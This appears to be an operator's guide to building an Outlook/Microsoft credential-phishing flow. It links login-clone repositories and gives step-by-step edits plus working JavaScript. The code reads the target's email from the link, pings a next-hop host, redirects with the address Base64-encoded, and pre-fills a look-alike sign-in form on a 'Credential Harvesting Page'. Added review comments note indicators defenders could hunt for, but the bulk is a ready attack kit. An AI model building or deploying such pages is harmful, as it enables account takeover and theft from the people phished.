Phishing
Make sure to check what mailing server target is using first
Outlook Login Pages
https://github.com/Octagon-simon/microsoft-login-clone https://github.com/JoniRinta-
Kahila/microsoft-login-spoof/blob/main/HTML%26JS-only/index.html
Setup Landing Page (Cover Page)
Remove any javascripts
Remove all forms
Add "Welcome , Continue Sign in as"
<span id="gf-user"></span>
where gf user get from email linkAdd to "sign in button" onclick="redirected()"
Add js script
<script>
/**
 * Page-load handler: reads the `email` and `url` query parameters, requests
 * the `url` value twice in the background, and shows the e-mail address in
 * the #gf-user element.
 *
 * NOTE(review): this is the cover page of a credential-phishing flow. What a
 * defender can observe is a page URL that carries the recipient's address in
 * `email=` and a next-hop address in `url=`, followed by background GETs to
 * that next hop as soon as the page loads.
 */
function onWindowLoad() {
const urlParams = new URLSearchParams(window.location.search);
// Both values come straight from the clicked link; neither is validated here.
const email = urlParams.get('email');
const destination = urlParams.get('url');
// The same URL is requested by XMLHttpRequest and again by fetch(); neither
// response is read. Each page view would normally appear in proxy logs as two
// GETs to the next-hop host before the user has clicked anything.
var xhr = new XMLHttpRequest();
xhr.open('GET', destination, true);
xhr.send();
fetch(destination);
// innerText inserts the address as text, not markup. When `email` is absent,
// get() returns null and the template literal renders the string "null".
var outputCdc = document.getElementById("gf-user");
outputCdc.innerText=`${email}`;
}
// Property assignment: this becomes the page's only onload callback and
// replaces any handler assigned to window.onload earlier.
window.onload = onWindowLoad;
/**
 * Click handler for the sign-in button: navigates the browser to the address
 * in the `url` query parameter with the Base64-encoded `email` value appended
 * as `key`, or to 'defaultPage.html' when no `url` parameter is present.
 *
 * NOTE(review): Base64 is an encoding, not protection. Anyone who sees the
 * resulting URL (proxy, gateway or referrer logs) can decode `key=` back to
 * the recipient's address, so a `key=` value that decodes to an internal
 * mailbox is a usable hunting indicator for this flow.
 */
function redirected() {
const urlParams = new URLSearchParams(window.location.search);
// Navigation target and address both come from the query string, unvalidated.
const destination = urlParams.get('url');
const email = urlParams.get('email');
// btoa() encodes whatever get() returned; no check that `email` is present.
const emailb = btoa(email);
if (destination) {
// Appended with "&", so the code assumes `url` already contains a query string.
window.location.href = destination + "&key=" + emailb;
} else {
window.location.href = 'defaultPage.html';
}
}
</script>
Setup Login Page (Credential Harvesting Page)
Add js script
<script>
// Page-load handler for the look-alike sign-in page: decodes the Base64 `key`
// query parameter and pre-fills the recovered address into the form.
//
// NOTE(review): a sign-in form that arrives with the victim's address already
// filled in, on a host that is not the organisation's identity provider, is
// the user-visible sign of this flow; the address comes from the link, not
// from any session.
window.onload = function() {
const urlParams = new URLSearchParams(window.location.search);
const emailb = urlParams.get('key');
// No check that `key` is present or valid Base64; atob() throws on invalid input.
const email = atob(emailb);
const inpele2 = document.getElementById('emailkau');
const inpele3 = document.getElementById('displayName');
// The address goes into the input's value and into the display element as
// plain text (textContent), not as markup.
inpele2.value = email;
inpele3.textContent = email;
};
</script>
Remember to replace any value with "emailkau" to show email when load